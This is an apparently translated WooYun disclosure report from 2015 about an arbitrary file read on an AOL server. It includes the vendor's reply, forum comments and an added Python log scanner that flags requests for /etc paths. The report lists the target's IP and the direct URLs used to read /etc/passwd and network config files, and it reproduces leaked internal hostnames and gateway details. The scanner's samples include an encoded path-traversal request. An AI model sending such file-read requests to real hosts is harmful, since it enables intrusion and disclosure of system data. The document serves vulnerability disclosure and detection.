
Vulnerability summary

Defect ID: wooyun-2015-093786

Title: Arbitrary system file read vulnerability on an AOL subsite

Vendor: aol.com

Author: 猪猪侠

Submitted: 2015-02-03 11:43

Fixed: 2015-03-20 11:44

Published: 2015-03-20 11:44

Type: Sensitive information disclosure

Severity: Medium

Self-assessed rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-02-03: Details reported to the vendor, awaiting vendor action
2015-02-05: Vendor confirmed; details visible to the vendor only
2015-02-15: Details disclosed to core white hats and relevant domain experts
2015-02-25: Details disclosed to regular white hats
2015-03-07: Details disclosed to intern white hats
2015-03-20: Details disclosed to the public

Brief description:

Arbitrary system file read vulnerability on an AOL subsite

Detailed description:

https://www.shodan.io/host/149.174.97.92

149.174.97.92
http://huffsmith-shared-a-atc.evip.aol.com/


last



http://149.174.97.92/etc/sysconfig/network

NETWORKING=yes
NETWORKING_IPV6=no
HOSTNAME=amp-prod-blogside-a108.ihost.aol.com
GATEWAY=205.188.29.254

http://149.174.97.92/etc/passwd


Proof of vulnerability:

# Do not  remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
149.174.108.111 amp-prod-blogside-a114.ihost.aol.com amp-prod-blogside-a114.ihost.aol amp-prod-blogside-a114.ihost amp-prod-blogside-a114


Remediation:

Reconfigure the server.
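As an added illustration (not part of the original report and not AOL's code): a small access-log scanner that flags requests which reach OS paths such as the /etc/passwd and /etc/sysconfig/network files served by this host, normalizing percent-encoding and ../ segments so encoded or traversal variants are caught. The combined log format is assumed and the sample lines are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

# Apache/nginx "combined" access-log format (assumed); only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# OS locations a web server should never serve; /etc/ covers the files in this report.
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/root/", "/var/log/", "/home/")


def normalize(path: str) -> str:
    """Drop the query string, percent-decode twice (catches double encoding),
    fold backslashes and collapse ../ so every variant maps to one canonical path."""
    path = path.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    path = path.replace("\\", "/")
    return posixpath.normpath("/" + path.lstrip("/"))


def is_sensitive(path: str) -> bool:
    return normalize(path).startswith(SENSITIVE_PREFIXES)


def scan(log_text: str):
    """Return (client ip, canonical path, status) for each request that reached a
    sensitive OS path; a 200 means the file was actually served, not just requested."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_sensitive(m["path"]):
            hits.append((m["ip"], normalize(m["path"]), int(m["status"])))
    return hits


# Constructed sample log: three disclosures (one via encoded traversal) and two benign requests.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jan/2015:22:10:01 +0800] "GET /etc/passwd HTTP/1.1" 200 8192 "-" "curl/7.35"
203.0.113.5 - - [24/Jan/2015:22:10:03 +0800] "GET /etc/sysconfig/network HTTP/1.1" 200 101 "-" "curl/7.35"
203.0.113.5 - - [24/Jan/2015:22:10:05 +0800] "GET /images/..%2f..%2fetc%2fhosts HTTP/1.1" 200 240 "-" "curl/7.35"
198.51.100.7 - - [24/Jan/2015:22:11:00 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Jan/2015:22:11:02 +0800] "GET /etcetera/page.html HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, path, status in scan(SAMPLE_LOG):
        print(f"{ip} -> {path} ({status})")
```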

Copyright notice: when reposting, credit the source: 猪猪侠@乌云


Vulnerability response

Vendor response:

Severity: Medium

Rank: 6

Confirmed: 2015-02-05 02:42

Vendor reply:

Latest status:

2015-02-05:Please remove this link and do NOT publish this vulnerability until we have had a chance to correct the issue.


Vulnerability rating:

Comments

  1. 2015-01-24 22:18 | 蛇精病 ( Passer-by | Rank:23 Vulns:10 | You don't even have a lollipop, and you talk about love?)

    First

  2. 2015-01-24 22:20 | Black Angel ( Regular white hat | Rank:163 Vulns:35 | The most amazing group of people, wise, low-key and reserved, commonly known as sock puppets...)

    Second

  3. 2015-01-24 22:27 | 动后河 ( Intern white hat | Rank:51 Vulns:13 | ☭)

    AOL is a foreign company, right?

  4. 2015-01-24 23:13 | px1624 ( Regular white hat | Rank:1036 Vulns:175 | px1624)

    @动后河 America Online, awesome

  5. 2015-01-25 00:18 | f4ck ( Intern white hat | Rank:42 Vulns:7 | Some people are amazing; they can turn one vulnerability into N.)

    Is this the start of pulling big foreign companies onto WooYun?

  6. 2015-01-25 09:03 | 小呆呆 ( Intern white hat | Rank:41 Vulns:7 | Every time someone calls me a pig, I say my idol is a pig too)

    What is AOL?

  7. 2015-01-25 16:35 | ′雨。 ( Regular white hat | Rank:1231 Vulns:190 | Only Code Never Lie To Me.)

    American Online

  8. 2015-01-26 12:42 | aNsSe ( Passer-by | Rank:0 Vulns:2 | Walking the world alone)

    Just popping in

  9. 2015-01-26 15:11 | _Thorns ( Regular white hat | Rank:882 Vulns:157 | Buying wb at 1:5, unlimited [platform escrow]))

    cool

  10. 2015-01-26 17:20 | 肉肉 [Certified white hat] ( Regular white hat | Rank:112 Vulns:10 | 肉肉 is at Chaitin Tech, 肉肉 is at Chaitin Tech, 肉肉 is at Chai...)

    猪哥 is impressive

  11. 2015-01-26 17:21 | 好人 ( Passer-by | Rank:13 Vulns:6 | How many people once admired your youthful face)

    3000rank

  12. 2015-01-29 18:43 | s3xy ( Core white hat | Rank:832 Vulns:113 | Rather than sustain each other in hardship, better to forget each other in the wide world)

    3000rank

  13. 2015-01-31 22:02 | 泪雨无魂 ( Intern white hat | Rank:94 Vulns:32 )

    Bowing down to 猪哥

  14. 2015-02-03 11:44 | 肉肉 [Certified white hat] ( Regular white hat | Rank:112 Vulns:10 | 肉肉 is at Chaitin Tech, 肉肉 is at Chaitin Tech, 肉肉 is at Chai...)

    AOL has come to claim the vulnerability. 猪哥 has once again contributed to getting foreigners to learn Chinese.

  15. 2015-02-03 11:47 | Ano_Tom ( Regular white hat | Rank:368 Vulns:40 | Talk is cheap.:)

    Thank you for the detailed report, we will evaluate this and respond as needed.

  16. 2015-02-03 12:00 | 泳少 ( Regular white hat | Rank:231 Vulns:79 | ★ Once you've set foot on the road of dreams, even on your knees you must...)

    The big companies are all being pulled in by 猪猪侠.

  17. 2015-02-03 13:55 | 秋风 ( Regular white hat | Rank:438 Vulns:44 | A code monkey, following internet security)

    NB!

  18. 2015-02-03 22:13 | 袋鼠妈妈 ( Regular white hat | Rank:449 Vulns:61 | Hometown Scenery.MP3)

    3W rank

  19. 2015-02-05 07:39 | Dusk ( Passer-by | Rank:1 Vulns:1 | Newbie here, experts please don't hit me..!)

    3E rank

  20. 2015-02-05 08:19 | ′雨。 ( Regular white hat | Rank:1231 Vulns:190 | Only Code Never Lie To Me.)

    Does this mean: don't disclose the vulnerability until we've confirmed it?

  21. 2015-02-05 08:57 | fuckadmin ( Regular white hat | Rank:476 Vulns:72 | A thousand-mile dike collapses from an ant hole)

    Please remove this link and do not publish this vulnerability until we have had a chance to correct the issue. The vendor needs a guy who speaks Chinese. @aol.com

  22. 2015-02-05 10:30 | 蛇精病 ( Passer-by | Rank:23 Vulns:10 | You don't even have a lollipop, and you talk about love?)

    Please remove this link and do not publish this vulnerability until we have had a chance to correct this issue.

  23. 2015-02-05 13:43 | 小呆呆 ( Intern white hat | Rank:41 Vulns:7 | Every time someone calls me a pig, I say my idol is a pig too)

    This vendor reply is a bit forceful

  24. 2015-02-05 14:47 | luwikes ( Regular white hat | Rank:512 Vulns:77 | Studying hard~~~)

    Looks like they don't understand the rules.

  25. 2015-02-08 21:30 | jeary ( Regular white hat | Rank:296 Vulns:106 | (:‮.kcaH eb nac gnihtynA))

    +999999999999999999

  26. 2015-02-08 21:38 | 胡小树 ( Intern white hat | Rank:60 Vulns:11 | I am a little tree)

    The vendor reply is pretty domineering

  27. 2015-02-10 10:57 | 肉肉 [Certified white hat] ( Regular white hat | Rank:112 Vulns:10 | 肉肉 is at Chaitin Tech, 肉肉 is at Chaitin Tech, 肉肉 is at Chai...)

    Actually, I don't think there is any need to dwell on this vendor reply. Chinese and English express things differently, and are you sure your own translation is correct?

  28. 2015-02-11 21:33 | Power ( Intern white hat | Rank:54 Vulns:22 | Still need to wait.........)

    .....

  29. 2015-02-12 09:03 | xsser [Certified white hat] ( Regular white hat | Rank:254 Vulns:18 | When I look back on everything again, will this world be okay?)

    Hasn't WooYun always done it this way?

  30. 2015-02-25 13:55 | 你大爷在此 百无禁忌 ( Passer-by | Rank:10 Vulns:6 | Hello everyone, hi all, I'm 王尼玛)

    猪哥, where's your secret weapon? Fire one off

  31. 2015-03-06 16:43 | 朵宝宝 ( Passer-by | Rank:6 Vulns:6 | sorry)

    猪哥! Bring out the secret weapon

  32. 2015-07-19 16:11 | sOnsec ( Intern white hat | Rank:93 Vulns:24 | What is security...)

    666

  33. 2015-07-20 21:37 | sOnsec ( Intern white hat | Rank:93 Vulns:24 | What is security...)

    Here to learn